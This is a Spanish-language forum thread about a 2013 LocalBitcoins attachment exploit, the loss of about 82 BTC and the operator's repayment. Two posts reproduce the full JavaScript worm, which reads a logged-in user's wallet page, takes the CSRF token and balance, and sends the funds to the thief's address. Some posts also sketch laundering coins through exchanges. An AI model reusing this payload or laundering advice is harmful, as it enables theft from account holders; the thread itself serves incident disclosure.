[SOLUCIONADO] OJO! Exploit Localbitcoins

BitAddict

legendary

Activity: 1190

Merit: 1001

Quote from: dserrano5 on September 16, 2013, 03:31:11 PM

Quote from: Argen-Coin on September 16, 2013, 02:52:54 PM

Hace poco salió la noticia de que una Universidad había desarrollado un software bastante más sofisticado para poder "tracear" (seguir) todas las transacciones, con lo que tal vez, esta posibilidad, algún día acabe pero, en ese caso, ya no podrá decirse más que el bitcoin es "anónimo" e "intraceable".

No creo. Esto de CoinJoin está ganando tracción y si algún día se implementa en el cliente oficial (o en cualquier otro que use mucha gente), el "blanqueo" de dinero será una característica estándar de bitcoin y no habrá manera de trazarlo.

Estoy totalmente de acuerdo con dserrano, lo más probable es que CoinJoin o similares se empiecen a utilizar cada vez más.

Pero como bien dices esto también pasa con el dinero en efectivo todos los días... y aquí para colmo tienes al estado, del que no te escapas de devaluaciones.. etc

dserrano5

legendary

Activity: 1974

Merit: 1029

Quote from: Argen-Coin on September 16, 2013, 02:52:54 PM

Hace poco salió la noticia de que una Universidad había desarrollado un software bastante más sofisticado para poder "tracear" (seguir) todas las transacciones, con lo que tal vez, esta posibilidad, algún día acabe pero, en ese caso, ya no podrá decirse más que el bitcoin es "anónimo" e "intraceable".

No creo. Esto de CoinJoin está ganando tracción y si algún día se implementa en el cliente oficial (o en cualquier otro que use mucha gente), el "blanqueo" de dinero será una característica estándar de bitcoin y no habrá manera de trazarlo.

Argen-Coin

full member

Activity: 146

Merit: 100

Bitcoins to Argentine

Quote from: haztecoin on September 16, 2013, 01:41:19 PM

En algo te equivocas el bitcoin es mucho más fácil de rastrear que el dinero en metálico. Pues todas las transacciones se conservan desde el origen al destino. Además el bitcoin puedes rastrearlo a posteriori cosa que el dinero en mano tienes que rastrearlo a priori únicamente.

haztecoin:

tu puedes seguir la transacción pero no el propietario de la cuenta vinculada. De lo contrario no habría "robos de bitcoin" y los tienes a diario.

Tal como acaba de explicarte deserrano5 basta luego "enjuagar" un poco las transferencias y terminas alegremente con el dinero limpio en tu cuenta.

Hace poco salió la noticia de que una Universidad había desarrollado un software bastante más sofisticado para poder "tracear" (seguir) todas las transacciones, con lo que tal vez, esta posibilidad, algún día acabe pero, en ese caso, ya no podrá decirse más que el bitcoin es "anónimo" e "intraceable".

dserrano5

legendary

Activity: 1974

Merit: 1029

Quote from: haztecoin on September 16, 2013, 01:41:19 PM

En algo te equivocas el bitcoin es mucho más fácil de rastrear que el dinero en metálico. Pues todas las transacciones se conservan desde el origen al destino. Además el bitcoin puedes rastrearlo a posteriori cosa que el dinero en mano tienes que rastrearlo a priori únicamente.

Pero también es mucho más fácil de blanquear. Lo mandas a un par de exchanges y billeteras online y listo, de vuelta a casita.

haztecoin

sr. member

Activity: 294

Merit: 250

Quote from: Argen-Coin on September 16, 2013, 01:13:33 PM

El problema aquí es que, más temprano que tarde, el uso delictivo del bitcoin acarreará problemas para el área "de negocios" que, legítimamente, espera alguna vez crecer y desarrollarse.

El hecho de un que extorsionador pueda pedir alegremente su dinero a una cuenta o que, cualquier ladrón tenga esta facilidad será el gran asunto en el debate de la "legitimación" del bitcoin.

Convengamos que, con "dinero en mano" pueden ocurrir idénticas cosas y no por eso se prohíbe -al menos todavía porque ganas tienen- el "dinero papel".

Pero, la policía siempre podrá alegar que, en el pago FISICO de un rescate ellos tienen alguna posibilidad de hacer un seguimiento o rastreo y llegar al delicuente mientras que, si éstos empiezan a contar con la facilidad de hacerlo "on line" y sin problemas, la policía quedará con dos palmos de narices.

Sin duda este es uno de los problemas más complicados que enfrenta bitcoin, no como proyecto en si mismo -es una regla de juego y puedes aceptarla- sino en su pretensión de ser reconocido como una moneda en el "mundo real" en igualdad de condiciones con el resto de las monedas.

En algo te equivocas el bitcoin es mucho más fácil de rastrear que el dinero en metálico. Pues todas las transacciones se conservan desde el origen al destino. Además el bitcoin puedes rastrearlo a posteriori cosa que el dinero en mano tienes que rastrearlo a priori únicamente.

Argen-Coin

full member

Activity: 146

Merit: 100

Bitcoins to Argentine

El problema aquí es que, más temprano que tarde, el uso delictivo del bitcoin acarreará problemas para el área "de negocios" que, legítimamente, espera alguna vez crecer y desarrollarse.

El hecho de un que extorsionador pueda pedir alegremente su dinero a una cuenta o que, cualquier ladrón tenga esta facilidad será el gran asunto en el debate de la "legitimación" del bitcoin.

Convengamos que, con "dinero en mano" pueden ocurrir idénticas cosas y no por eso se prohíbe -al menos todavía porque ganas tienen- el "dinero papel".

Pero, la policía siempre podrá alegar que, en el pago FISICO de un rescate ellos tienen alguna posibilidad de hacer un seguimiento o rastreo y llegar al delicuente mientras que, si éstos empiezan a contar con la facilidad de hacerlo "on line" y sin problemas, la policía quedará con dos palmos de narices.

Sin duda este es uno de los problemas más complicados que enfrenta bitcoin, no como proyecto en si mismo -es una regla de juego y puedes aceptarla- sino en su pretensión de ser reconocido como una moneda en el "mundo real" en igualdad de condiciones con el resto de las monedas.

BitAddict

legendary

Activity: 1190

Merit: 1001

Quote from: Shawshank on September 14, 2013, 09:08:06 AM

Quote from: Anillos2 on September 14, 2013, 08:34:21 AM

¿Y no podrían los mineros acordar no aceptar ninguna transacción proveniente de 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c?

Sería una forma de anular ese dinero y dejar al hacker en cuestión con un palmo de narices.

Supongo que Bitcoin es incensurable porque precisamente no puedes evitar que un minero, con una tarifa de transacción suficientemente alta, la incluya en la cadena de bloques. Además, en este caso, una vez que has publicado la transacción en la red P2P, aunque sea un año después, ¿quién te va a garantizar que no hay alguien que la añada en ese momento a la cadena de bloques?

El dinero de todos los usuarios que protegen sus claves privadas adecuadamente es inconfiscable. Bitcoin es neutro, no entiende de intenciones.

El problema es que a medio/largo plazo el remedio es peor que la enfermedad. Imagínate que los mineros pudieran bloquear ciertos bitcoins... esto significa que se podría acusar a otra persona de robo (sin ser cierto) y bloquearle los bitcoins, ya sea por fastidiar o por bloquear a la competencia.

Entonces también los gobiernos podrían presionar para bloquear ciertos bitcoins, etc, etc, etc. Bitcoin se convertiría en un nuevo paypal.

De todas formas creo que es imposible, ya que a la que haya un minero o grupo de mineros (que los habrá) dispuestos a aceptar procesar esos bitcoins por la comisión, no se puede bloquear.

Shawshank

legendary

Activity: 1623

Merit: 1608

Quote from: Anillos2 on September 14, 2013, 08:34:21 AM

¿Y no podrían los mineros acordar no aceptar ninguna transacción proveniente de 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c?

Sería una forma de anular ese dinero y dejar al hacker en cuestión con un palmo de narices.

Supongo que Bitcoin es incensurable porque precisamente no puedes evitar que un minero, con una tarifa de transacción suficientemente alta, la incluya en la cadena de bloques. Además, en este caso, una vez que has publicado la transacción en la red P2P, aunque sea un año después, ¿quién te va a garantizar que no hay alguien que la añada en ese momento a la cadena de bloques?

El dinero de todos los usuarios que protegen sus claves privadas adecuadamente es inconfiscable. Bitcoin es neutro, no entiende de intenciones.

LuisCar

legendary

Activity: 1820

Merit: 1017

Quote from: Anillos2 on September 14, 2013, 08:34:21 AM

¿Y no podrían los mineros acordar no aceptar ninguna transacción proveniente de 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c?

Sería una forma de anular ese dinero y dejar al hacker en cuestión con un palmo de narices.

Aquí se habla sobre dicho asunto: http://www.coindesk.com/what-should-we-do-with-stolen-bitcoins/

Anillos2

legendary

Activity: 1260

Merit: 1003

¿Y no podrían los mineros acordar no aceptar ninguna transacción proveniente de 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c?

Sería una forma de anular ese dinero y dejar al hacker en cuestión con un palmo de narices.

BitAddict

legendary

Activity: 1190

Merit: 1001

Quote from: dserrano5 on September 13, 2013, 04:35:42 PM

En este comentario de Reddit se distingue entre 2FA para hacer login y para sacar pasta. Sin embargo hago clics por aquí y por allá en localbitcoins y no acabo de encontrar nada parecido, simplemente hay 2FA y nada más, y doy por hecho que el mismo código sirve para todo. Tampoco veo nada en el FAQ. ¿A alguien le suena que se puedan usar dos 2FAs en localbitcoins?

Se utiliza el mismo 2FA para hacer login que para hacer cashout. Desconozco si de alguna forma se puede activar un segundo 2FA.

dserrano5

legendary

Activity: 1974

Merit: 1029

En este comentario de Reddit se distingue entre 2FA para hacer login y para sacar pasta. Sin embargo hago clics por aquí y por allá en localbitcoins y no acabo de encontrar nada parecido, simplemente hay 2FA y nada más, y doy por hecho que el mismo código sirve para todo. Tampoco veo nada en el FAQ. ¿A alguien le suena que se puedan usar dos 2FAs en localbitcoins?

Argen-Coin

full member

Activity: 146

Merit: 100

Bitcoins to Argentine

Perdón, vengo a aclarar esto.

En uno de los mensajes se da una dirección y, en el tema aparece otra.

El problema parece que ha afectado nomás a unos 82 btc.

No modifico el mensaje anterior por si ya lo han leído y para que no se preste a confusión el cambio de texto pero, si hago la aclaración aquí ahora que estoy leyendo el mensaje original en:

https://bitcointalk.org/index.php?topic=293291.20

Argen-Coin

full member

Activity: 146

Merit: 100

Bitcoins to Argentine

Pues, si te fijas la FECHA verás que tiene razón WSDN. Todas las operaciones son del 12/9 y el total suma $ 10.500 (aprox) lo que daría más bien 820-900 btc.

https://blockchain.info/address/12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c

Para mi que puso un cero de menos al escribir el mensaje.

De todos modos, está bien si asume esa pérdida de sus clientes aunque le tome algunos meses. Ahí los dos grandes damnificados son uno de $ 6000 y otro de $ 2000 que deben estar llorando en la cocina en estos momentos Cry

BitAddict

legendary

Activity: 1190

Merit: 1001

Quote from: WSDN on September 13, 2013, 10:10:34 AM

Apostemos todo a local bitcoins que ellos nos dan fuerzas, si dios, ese tipo de falla de seguridad en la web es de lo mas comun, no puedo ni pensar ni creer que podian cargar codigo mediante archivos adjuntos diooooos! en que planeta estas localbitcoins! Nose de donde sacan los 82 btc, mas de 1000 btc fueron recibidos en esa direccion que se utilizo para hackear a los confiados.

El tan temido script es solo un simple gusano. Bueno ya saben para los proximos emprededores, bitcoin es dinero y por tanto deben tomarse las medidas de seguridad necesarias, contraten profesionales.

Code:

function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Las transacciones que suman 1,000 bitcoins son antiguas, no tienen nada que ver con el robo actual, que ha sido de aprox 82 btc.

WSDN

sr. member

Activity: 493

Merit: 250

IDENA.IO - Proof-Of-Person Blockchain

Apostemos todo a local bitcoins que ellos nos dan fuerzas, si dios, ese tipo de falla de seguridad en la web es de lo mas comun, no puedo ni pensar ni creer que podian cargar codigo mediante archivos adjuntos diooooos! en que planeta estas localbitcoins! Nose de donde sacan los 82 btc, mas de 1000 btc fueron recibidos en esa direccion que se utilizo para hackear a los confiados.

El tan temido script es solo un simple gusano. Bueno ya saben para los proximos emprededores, bitcoin es dinero y por tanto deben tomarse las medidas de seguridad necesarias, contraten profesionales.

Code:

function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

haztecoin

sr. member

Activity: 294

Merit: 250

Quote from: BitAddict on September 12, 2013, 09:05:36 PM

Buenas noticias por parte del dueño de localbitcoins.

Quote from: Jeremias

Attachments will stay disabled for the time being. We will think if we disable the feature altogether.
The total loss related to the file upload scam are very likely 82 BTC. I will start covering losses soon.

Traducción:

Code:

Han desabilitado los archivos adjuntos y están pensando si desactivarla por completo.
La pérdida total por estafa ha sido de 82 btc que él mismo cubrirá de su bolsillo.

Mi más sincera enhorabuena a localbitcoins, ya que han solucionado una situación de pánico de forma rápida y con estilo

PD: Investigando un poco he encontrado que en Junio 2013 LB estaba moviendo unos 400-900btc/día. Por lo que la estafa se lleva aproximadamente unos 10-15 días de beneficio de la empresa.

Solo faltaría que no se hiciesen responsables de su propio sitio.
Pero como muchos están acostumbrados a que cuando algo va mal los responsables se escaqueen.
Hacen lo que tienen que hacer si hiciesen lo contrario seria criticable.

dserrano5

legendary

Activity: 1974

Merit: 1029

Si la web no necesitara javascript, los usuarios de NoScript estarían a salvo…

BitAddict

legendary

Activity: 1190

Merit: 1001

Buenas noticias por parte del dueño de localbitcoins.

Quote from: Jeremias

Attachments will stay disabled for the time being. We will think if we disable the feature altogether.
The total loss related to the file upload scam are very likely 82 BTC. I will start covering losses soon.

Traducción:

Code:

Han desabilitado los archivos adjuntos y están pensando si desactivarla por completo.
La pérdida total por estafa ha sido de 82 btc que él mismo cubrirá de su bolsillo.

Mi más sincera enhorabuena a localbitcoins, ya que han solucionado una situación de pánico de forma rápida y con estilo

PD: Investigando un poco he encontrado que en Junio 2013 LB estaba moviendo unos 400-900btc/día. Por lo que la estafa se lleva aproximadamente unos 10-15 días de beneficio de la empresa.

BitAddict

legendary

Activity: 1190

Merit: 1001

IMPORTANTE: Por lo visto han encontrado una forma de robar los bitcoins almacenados en las carteras de localbitcoins a través de la opción de subir archivos. Mucho cuidado si tenéis bitcoins ahí almacenados!

Al menos parece que localbitcoins ya ha reaccionado y ha bloqueado los retiros y adjuntar documentos.

Fuente: https://bitcointalksearch.org/topic/m.3141566

Topic: [SOLUCIONADO] OJO! Exploit Localbitcoins (Read 1338 times)